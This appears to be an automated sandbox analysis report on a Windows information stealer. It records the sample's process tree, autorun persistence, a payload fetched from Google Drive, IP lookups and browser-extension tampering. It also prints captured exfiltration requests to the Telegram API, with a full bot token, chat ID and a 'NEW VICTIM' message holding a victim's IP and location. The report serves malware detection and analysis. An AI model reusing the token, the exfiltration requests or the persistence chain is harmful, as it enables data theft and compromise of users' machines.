Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1573853
MD5:	3567cb15156760b2f111512ffdbc1451
SHA1:	2fdb1f235fc5a9a32477dab4220ece5fda1539d4
SHA256:	0285d3a6c1ca2e3a993491c44e9cf2d33dbec0fb85fdbf48989a4e3b14b37630
Tags:	exeuser-Bitsight
Infos:

Detection

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Contains functionality to determine the online IP of the system

Creates files in the system32 config directory

Machine Learning detection for sample

Tries to harvest and steal browser information (history, passwords, etc)

Uses the Telegram API (likely for C&C communication)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to enumerate network shares

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates COM task schedule object (often to register a task for autostart)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 7456 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3567CB15156760B2F111512FFDBC1451)

graph.exe (PID: 7744 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)

file.exe (PID: 7540 cmdline: C:\Users\user\Desktop\file.exe MD5: 3567CB15156760B2F111512FFDBC1451)

graph.exe (PID: 7880 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)

graph.exe (PID: 8140 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)

graph.exe (PID: 8184 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\output[1].png	INDICATOR_SUSPICIOUS_IMG_Embedded_Archive	Detects images embedding archives. Observed in TheRat RAT.	ditekSHen	0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png	INDICATOR_SUSPICIOUS_IMG_Embedded_Archive	Detects images embedding archives. Observed in TheRat RAT.	ditekSHen	0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f	INDICATOR_SUSPICIOUS_IMG_Embedded_Archive	Detects images embedding archives. Observed in TheRat RAT.	ditekSHen	0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files\Windows Media Player\graph\graph.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 7456, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\file.exe	Directory created: C:\Program Files\Google\Chrome\Extensions	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory created: C:\Program Files\Windows Media Player\graph	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory created: C:\Program Files\Windows Media Player\graph\graph.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip	Jump to behavior

Source: unknown	HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.9:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.9:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.65:443 -> 192.168.2.9:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.65:443 -> 192.168.2.9:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.9:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.9:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49749 version: TLS 1.2

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb% source: file.exe, 00000000.00000003.1441801975.000002321A614000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000004.00000002.2586789149.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000004.00000000.1442015402.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000005.00000002.2586599577.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000005.00000000.1465637036.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000007.00000002.2586631310.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000007.00000000.1562238988.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000008.00000000.1642942576.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000008.00000002.2586573272.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe.0.dr
Source:	Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: file.exe
Source:	Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb[ source: file.exe
Source:	Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: file.exe, 00000000.00000003.1441801975.000002321A614000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000004.00000002.2586789149.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000004.00000000.1442015402.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000005.00000002.2586599577.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000005.00000000.1465637036.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000007.00000002.2586631310.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000007.00000000.1562238988.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000008.00000000.1642942576.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000008.00000002.2586573272.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe.0.dr

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF7ABC08A90 NetUserEnum,WideCharToMultiByte,WideCharToMultiByte,NetApiBufferFree,_invalid_parameter_noinfo_noreturn,

0_2_00007FF7ABC08A90

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC09B00 GetEnvironmentVariableW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF7ABC09B00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC3E440 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,	0_2_00007FF7ABC3E440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC3E3CC FindClose,FindFirstFileExW,GetLastError,	0_2_00007FF7ABC3E3CC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC6070C FindFirstFileExW,	0_2_00007FF7ABC6070C
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 4_2_00007FF6A22FCD08 FindClose,FindFirstFileExW,GetLastError,	4_2_00007FF6A22FCD08
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 4_2_00007FF6A230FA54 FindFirstFileExW,	4_2_00007FF6A230FA54
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 4_2_00007FF6A22FCD7C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,	4_2_00007FF6A22FCD7C

Networking

Contains functionality to determine the online IP of the system

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC13CE0 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, IPInfoFetcher		0_2_00007FF7ABC13CE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF7ABC13CE0 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, https://ipinfo.io/json		0_2_00007FF7ABC13CE0

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

DNS query: name: ipinfo.io

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF7ABC13CE0 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF7ABC13CE0

Source: global traffic	HTTP traffic detected: GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1User-Agent: IPInfoFetcherHost: ipinfo.ioCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1User-Agent: IPInfoFetcherHost: ipinfo.ioCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20065367%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1User-Agent: TelegramBotHost: api.telegram.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20065367%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1User-Agent: TelegramBotHost: api.telegram.orgCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/
Source: file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/-
Source: file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/.d
Source: file.exe, 00000000.00000002.1490638191.000002321A600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/2
Source: file.exe, 00000000.00000002.1490638191.000002321A600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/J
Source: file.exe	String found in binary or memory: https://api.telegram.org/bot
Source: file.exe, 00000000.00000002.1490638191.000002321A600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o
Source: file.exe, 00000002.00000002.1503968722.0000012D10374000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=74270
Source: file.exe	String found in binary or memory: https://api.telegram.org/botFailed
Source: file.exe, 00000002.00000002.1503968722.0000012D10374000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/dentifier
Source: file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/nd
Source: file.exe, 00000002.00000002.1503968722.0000012D10374000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/t-477772811-jspb
Source: file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: file.exe, 00000000.00000003.1354266433.000002321891D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354180465.000002321891C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353854851.00000232188FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353888422.000002321890D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354458754.000002321891D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354061434.0000023218911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore/
Source: file.exe, 00000002.00000003.1361248501.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361329796.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore3D
Source: file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361365160.0000012D10311000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore7
Source: file.exe, 00000000.00000003.1353932053.0000023218926000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353854851.00000232188FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353888422.000002321890D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353955254.0000023218931000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreQ
Source: file.exe, 00000002.00000003.1361248501.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361365160.0000012D1032F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361329796.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreRc
Source: file.exe, 00000002.00000003.1361064723.0000012D10341000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361033757.0000012D10328000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1360996024.0000012D1031E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreh
Source: file.exe, 00000000.00000003.1354266433.000002321891D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354180465.000002321891C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353854851.00000232188FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353888422.000002321890D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354458754.000002321891D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354061434.0000023218911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstorem
Source: file.exe, 00000000.00000002.1490397342.0000023218906000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://clients2.goo
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: file.exe, 00000000.00000003.1353795713.000002321890C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353854851.00000232188FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353888422.000002321890D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx-
Source: file.exe, 00000000.00000003.1353854851.00000232188FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353888422.000002321890D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx5
Source: file.exe, 00000002.00000003.1361248501.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361501894.0000012D10331000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361365160.0000012D1032F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361329796.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx8
